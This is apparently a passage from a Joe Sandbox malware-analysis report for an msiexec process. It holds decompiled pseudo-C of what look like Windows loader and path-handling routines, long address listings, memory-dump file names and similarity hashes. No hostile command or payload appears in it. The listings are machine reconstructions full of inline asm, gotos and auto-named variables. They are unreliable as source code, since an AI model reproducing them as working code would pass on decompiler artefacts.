															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E04D4F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E04D052A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E04D1EB70(1, 0x4df79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E04D1AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E04D495D0();
																			L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E04D4B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04D43D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E04D4B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                              0x04d24128
                              0x04d24135
                              0x04d2413c
                              0x04d24141
                              0x04d24145
                              0x04d24147
                              0x04d2414e
                              0x04d24151
                              0x04d24159
                              0x04d2415c
                              0x04d24160
                              0x04d24164
                              0x04d24168
                              0x04d2416c
                              0x04d2417f
                              0x04d24181
                              0x04d2446a
                              0x04d2446a
                              0x04d2418c
                              0x04d24195
                              0x04d24199
                              0x04d24432
                              0x04d24439
                              0x04d2443d
                              0x04d24442
                              0x04d24447
                              0x00000000
                              0x04d2419f
                              0x04d241a3
                              0x04d241b1
                              0x04d241b9
                              0x04d241bd
                              0x04d245db
                              0x04d245db
                              0x00000000
                              0x04d241c3
                              0x04d241c3
                              0x04d241ce
                              0x04d241d4
                              0x04d6e138
                              0x04d6e13e
                              0x04d6e169
                              0x04d6e16d
                              0x04d6e19e
                              0x04d6e16f
                              0x04d6e16f
                              0x04d6e175
                              0x04d6e179
                              0x04d6e18f
                              0x04d6e193
                              0x00000000
                              0x04d6e199
                              0x00000000
                              0x04d6e199
                              0x04d6e193
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d241da
                              0x04d241da
                              0x04d241df
                              0x04d241e4
                              0x04d241ec
                              0x04d24203
                              0x04d24207
                              0x04d6e1fd
                              0x04d24222
                              0x04d24226
                              0x04d6e1f3
                              0x04d6e1f3
                              0x04d2422c
                              0x04d2422c
                              0x04d24233
                              0x04d6e1ed
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d24239
                              0x04d24239
                              0x04d24239
                              0x04d24239
                              0x04d24233
                              0x04d24226
                              0x04d241ee
                              0x04d241ee
                              0x04d241f4
                              0x04d24575
                              0x04d6e1b1
                              0x04d6e1b1
                              0x00000000
                              0x04d2457b
                              0x04d2457b
                              0x04d24582
                              0x04d6e1ab
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d24588
                              0x04d24588
                              0x04d2458c
                              0x04d6e1c4
                              0x04d6e1c4
                              0x00000000
                              0x04d24592
                              0x04d24592
                              0x04d24599
                              0x04d6e1be
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d2459f
                              0x04d2459f
                              0x04d245a3
                              0x04d6e1d7
                              0x04d6e1e4
                              0x00000000
                              0x04d245a9
                              0x04d245a9
                              0x04d245b0
                              0x04d6e1d1
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d245b6
                              0x04d245b6
                              0x04d245b6
                              0x00000000
                              0x04d245b6
                              0x04d245b0
                              0x04d245a3
                              0x04d24599
                              0x04d2458c
                              0x04d24582
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d241f4
                              0x04d2423e
                              0x04d24241
                              0x04d245c0
                              0x04d245c4
                              0x00000000
                              0x04d245ca
                              0x04d245ca
                              0x00000000
                              0x04d6e207
                              0x04d6e20f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d245d1
                              0x00000000
                              0x00000000
                              0x04d245ca
                              0x00000000
                              0x04d24247
                              0x04d24247
                              0x04d24247
                              0x04d24249
                              0x04d24249
                              0x04d24249
                              0x04d24251
                              0x04d24251
                              0x04d24257
                              0x04d2425f
                              0x04d2426e
                              0x04d24270
                              0x04d2427a
                              0x04d6e219
                              0x04d6e219
                              0x04d24280
                              0x04d24282
                              0x04d24456
                              0x04d245ea
                              0x00000000
                              0x04d245f0
                              0x04d6e223
                              0x00000000
                              0x04d6e223
                              0x04d2445c
                              0x04d2445c
                              0x00000000
                              0x04d2445c
                              0x00000000
                              0x04d24288
                              0x04d2428c
                              0x04d6e298
                              0x04d24292
                              0x04d24292
                              0x04d2429e
                              0x04d242a3
                              0x04d242a7
                              0x04d242ac
                              0x04d6e22d
                              0x04d242b2
                              0x04d242b2
                              0x04d242b9
                              0x04d242bc
                              0x04d242c2
                              0x04d242ca
                              0x04d242cd
                              0x04d242cd
                              0x04d242d4
                              0x04d2433f
                              0x04d2433f
                              0x04d242d6
                              0x04d242d6
                              0x04d242d9
                              0x04d242dd
                              0x04d242eb
                              0x04d6e23a
                              0x04d242f1
                              0x04d24305
                              0x04d2430d
                              0x04d24315
                              0x04d24318
                              0x04d2431f
                              0x04d24322
                              0x04d2432e
                              0x04d2433b
                              0x04d2433b
                              0x00000000
                              0x04d2432e
                              0x04d242eb
                              0x04d2434c
                              0x04d2434e
                              0x04d24352
                              0x04d24359
                              0x04d2435e
                              0x04d24361
                              0x04d2436e
                              0x04d2438a
                              0x04d2438e
                              0x04d24396
                              0x04d2439e
                              0x04d243a1
                              0x04d243ad
                              0x04d243bb
                              0x04d243bb
                              0x04d243ad
                              0x04d2436e
                              0x04d243bf
                              0x04d243c5
                              0x04d24463
                              0x04d24463
                              0x04d243ce
                              0x04d243d5
                              0x04d243d9
                              0x04d243df
                              0x04d24475
                              0x04d24479
                              0x04d24491
                              0x04d24491
                              0x04d24479
                              0x04d243e5
                              0x04d243eb
                              0x04d243f4
                              0x04d243f6
                              0x04d243f9
                              0x04d243fc
                              0x04d243ff
                              0x04d244e8
                              0x04d244ed
                              0x04d244f3
                              0x04d6e247
                              0x00000000
                              0x04d244f9
                              0x04d24504
                              0x04d24508
                              0x04d2450f
                              0x04d6e269
                              0x00000000
                              0x04d24515
                              0x04d24519
                              0x04d24531
                              0x04d24534
                              0x04d24537
                              0x04d2453e
                              0x04d24541
                              0x04d2454a
                              0x04d6e255
                              0x04d6e255
                              0x04d6e25b
                              0x04d6e25e
                              0x04d6e261
                              0x04d6e261
                              0x04d24555
                              0x04d24559
                              0x04d2455d
                              0x04d6e26d
                              0x04d6e270
                              0x04d6e274
                              0x04d6e27a
                              0x04d6e27d
                              0x04d6e28e
                              0x04d6e28e
                              0x04d24563
                              0x04d24563
                              0x04d24569
                              0x04d24569
                              0x00000000
                              0x04d2455d
                              0x04d2450f
                              0x00000000
                              0x04d244f3
                              0x04d243ff
                              0x04d24405
                              0x04d24405
                              0x04d24405
                              0x04d242ac
                              0x04d2428c
                              0x04d24282
                              0x04d24407
                              0x04d2440d
                              0x04d6e2af
                              0x04d6e2af
                              0x04d24413
                              0x04d24413
                              0x00000000
                              0x04d241d4
                              0x00000000
                              0x04d241c3
                              0x04d241bd
                              0x04d24415
                              0x04d24415
                              0x04d24416
                              0x04d24417
                              0x04d24429
                              0x04d2416e
                              0x04d2416e
                              0x04d24175
                              0x04d24498
                              0x04d2449f
                              0x04d6e12d
                              0x00000000
                              0x04d6e133
                              0x00000000
                              0x04d6e133
                              0x04d244a5
                              0x04d244a5
                              0x04d244aa
                              0x00000000
                              0x04d244bb
                              0x04d244ca
                              0x04d244d6
                              0x04d244d7
                              0x04d244d8
                              0x04d244e3
                              0x04d244e3
                              0x04d244aa
                              0x04d2417b
                              0x04d2417b
                              0x04d2417b
                              0x00000000
                              0x04d2417b
                              0x04d24175
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 242bf0a149ead14822305f735e6c94b795d969396949abcae830cb5d3dd3d35b
                              • Instruction ID: 06e23f38455c19e949b8300bdf2f5d948799a9f8f693996fb80b80297b6db43d
                              • Opcode Fuzzy Hash: 242bf0a149ead14822305f735e6c94b795d969396949abcae830cb5d3dd3d35b
                              • Instruction Fuzzy Hash: 74F18F746086618FC724CF19C590A3AB7E1FFA8718F14892EF8C6CB250E774E991DB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D320A0 Relevance: .4, Instructions: 420COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 92%
                              			E04D320A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x4df8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04D32EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04D32EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E04D058EC(_t240);
									_t221 =  *0x4df5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x4df5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04D44A2C(0x4df6e40, 0x4d44b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04D27D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x4ce5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E04D3F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E04D3F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04D87016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04D22400(_t267 + 0x20);
															}
															L04D22400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04D32397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04D22280(_t134, 0x4df8608);
									__eflags =  *0x4df6e48 - _t253; // 0x3071b30
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E04D1FFB0(_t198, _t241, 0x4df8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x4df6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x4df8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04D36B90(_t210,  &_v64);
										_t262 =  *0x4df8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E04D3E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E04D497C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E04D4006A(0x4df8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x4df8608);
												E04D4B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x4df6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x4df6e48; // 0x3071b30
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E04D1FFB0(_t198, _t240, 0x4df8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E04D400C2(0x4df8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                              0x04d320a0
                              0x04d320a8
                              0x04d320ad
                              0x04d320b3
                              0x04d320b8
                              0x04d320c2
                              0x04d320c7
                              0x04d320cb
                              0x04d320d2
                              0x04d32263
                              0x04d32266
                              0x04d75836
                              0x04d75836
                              0x00000000
                              0x04d3226c
                              0x04d3226c
                              0x04d32270
                              0x04d32274
                              0x04d320e2
                              0x04d320e2
                              0x04d320e6
                              0x04d320ee
                              0x04d757dc
                              0x04d757de
                              0x04d757ec
                              0x04d757ec
                              0x04d757f1
                              0x04d757f3
                              0x04d757f8
                              0x00000000
                              0x04d757f8
                              0x04d757e0
                              0x04d757e4
                              0x04d757ea
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d757ea
                              0x04d320f4
                              0x04d320f4
                              0x04d320f8
                              0x04d320f8
                              0x04d320fc
                              0x04d32100
                              0x04d32106
                              0x04d32201
                              0x04d32206
                              0x04d3220b
                              0x04d3220e
                              0x04d322a9
                              0x04d322ac
                              0x00000000
                              0x00000000
                              0x04d322b2
                              0x04d322b5
                              0x04d75801
                              0x04d75806
                              0x00000000
                              0x00000000
                              0x04d75810
                              0x04d75815
                              0x04d75818
                              0x00000000
                              0x00000000
                              0x04d7581e
                              0x04d322bb
                              0x04d322bb
                              0x04d32218
                              0x04d32218
                              0x04d3221c
                              0x04d32220
                              0x04d32222
                              0x04d322c2
                              0x04d322c4
                              0x04d322dc
                              0x04d322dc
                              0x04d322e1
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d322e7
                              0x04d322c8
                              0x04d322cd
                              0x04d322d3
                              0x04d322d6
                              0x04d75823
                              0x04d75825
                              0x04d75827
                              0x00000000
                              0x00000000
                              0x04d7582d
                              0x00000000
                              0x04d7582d
                              0x00000000
                              0x04d32228
                              0x04d32228
                              0x00000000
                              0x04d32228
                              0x04d32222
                              0x04d32214
                              0x04d32214
                              0x00000000
                              0x04d32114
                              0x04d32114
                              0x04d32114
                              0x04d3211a
                              0x04d3211c
                              0x04d32348
                              0x04d3234d
                              0x04d75840
                              0x04d75845
                              0x04d75848
                              0x04d7584e
                              0x04d7584e
                              0x04d75848
                              0x04d32353
                              0x04d32355
                              0x04d32388
                              0x04d32388
                              0x04d32368
                              0x04d3236a
                              0x04d3236c
                              0x04d3238f
                              0x00000000
                              0x04d3236e
                              0x04d3236e
                              0x04d3218e
                              0x04d3218e
                              0x04d32191
                              0x04d32195
                              0x04d75a03
                              0x04d75a06
                              0x04d75a0c
                              0x04d75a0f
                              0x04d75a11
                              0x04d75a13
                              0x04d75a13
                              0x04d75a19
                              0x04d75a1f
                              0x00000000
                              0x04d3219b
                              0x04d3219b
                              0x04d321a0
                              0x04d32282
                              0x04d32284
                              0x04d32284
                              0x04d32284
                              0x04d32284
                              0x04d321a6
                              0x04d321a9
                              0x04d321ac
                              0x04d321ae
                              0x04d321b3
                              0x04d3228b
                              0x04d32290
                              0x04d32379
                              0x04d32296
                              0x04d32298
                              0x04d32298
                              0x04d32290
                              0x04d321b9
                              0x04d321be
                              0x04d322a2
                              0x04d322a2
                              0x04d321c4
                              0x04d321c8
                              0x04d321cc
                              0x04d321d0
                              0x04d321d4
                              0x04d321de
                              0x04d321e3
                              0x04d75a29
                              0x04d75a2c
                              0x00000000
                              0x00000000
                              0x04d75a3b
                              0x00000000
                              0x04d321e9
                              0x04d321e9
                              0x04d321e9
                              0x04d321ee
                              0x04d321f1
                              0x04d75a45
                              0x04d75a4b
                              0x04d75a52
                              0x04d75a58
                              0x04d75a5d
                              0x04d75a5f
                              0x04d75a71
                              0x04d75a61
                              0x04d75a6a
                              0x04d75a6a
                              0x04d75a76
                              0x04d75a79
                              0x04d75a7f
                              0x04d75a83
                              0x04d75a85
                              0x04d75a87
                              0x04d75a87
                              0x04d75a8c
                              0x04d75a91
                              0x04d75a97
                              0x04d75a9f
                              0x04d75aa0
                              0x04d75aa1
                              0x04d75aa6
                              0x04d75aab
                              0x04d75ab1
                              0x04d75ab3
                              0x04d75ab9
                              0x04d75aca
                              0x04d75ad4
                              0x04d75ad4
                              0x04d75ade
                              0x04d75ade
                              0x04d75aab
                              0x04d75a79
                              0x04d75a52
                              0x04d321f7
                              0x04d321f9
                              0x04d321fe
                              0x04d321fe
                              0x04d321e3
                              0x04d32195
                              0x04d3236c
                              0x04d32122
                              0x04d32122
                              0x04d32124
                              0x04d32231
                              0x04d32236
                              0x04d32236
                              0x04d32238
                              0x04d32238
                              0x04d32240
                              0x04d32242
                              0x04d32244
                              0x04d759fc
                              0x04d3218c
                              0x04d3218c
                              0x00000000
                              0x04d3218c
                              0x04d3224a
                              0x04d3224f
                              0x04d32256
                              0x04d32304
                              0x04d32309
                              0x04d3230f
                              0x04d3231e
                              0x04d3231e
                              0x04d3231e
                              0x04d32320
                              0x04d32325
                              0x04d3232a
                              0x04d3232c
                              0x04d3233e
                              0x04d3233e
                              0x00000000
                              0x04d3232c
                              0x04d32311
                              0x04d32317
                              0x04d3231a
                              0x04d3231c
                              0x04d32380
                              0x04d32380
                              0x04d32380
                              0x04d32384
                              0x00000000
                              0x00000000
                              0x04d32386
                              0x00000000
                              0x04d3231c
                              0x04d3225c
                              0x04d3225c
                              0x00000000
                              0x04d3225c
                              0x04d3212a
                              0x04d32134
                              0x04d32138
                              0x04d3213d
                              0x04d75858
                              0x04d75863
                              0x04d75863
                              0x04d75867
                              0x04d7586a
                              0x00000000
                              0x00000000
                              0x04d7586c
                              0x04d7586c
                              0x04d75871
                              0x04d75875
                              0x04d75877
                              0x04d75997
                              0x04d7599c
                              0x04d759a1
